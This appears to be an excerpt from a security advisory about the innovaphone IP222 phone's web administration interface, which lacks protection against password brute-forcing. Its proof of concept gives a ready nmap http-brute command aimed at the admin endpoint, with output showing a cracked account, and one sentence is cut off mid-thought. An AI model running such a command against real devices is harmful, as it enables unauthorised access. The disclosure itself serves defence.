Vulnerability Details:

The innovaphone IP222 provides a password protected administration
interface, which can be accessed via a web browser. Although the basic

used, it is still possible to perform brute-force attacks against the
password authentication process.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof of Concept (PoC):
The innovaphone IP222 provides a password protected administration
interface, which could be accessed via a web browser, but possesses no
countermeasures against brute-force attacks. Therefore, it is possible
to perform brute-force attacks with common tools like Nmap or Hydra:
nmap -p80 --min-rate=200 --script http-brute --script-args http-brute.
path="CMD0/mod_cmd.xml" 192.168.5.23 -d
(...)
Overall sending rates: 1042.75 packets / s.
NSE: Script scanning 192.168.5.23.
NSE: Starting runlevel 1 (of 1) scan.
NSE: Starting http-brute against 192.168.5.23:80.
Initiating NSE at 16:24
NSE: Discovered account: test:test - Valid credentials
Due to the current configuration settings, the sending rate for a web
based brute-force attack is almost 1042.75 packets per second.
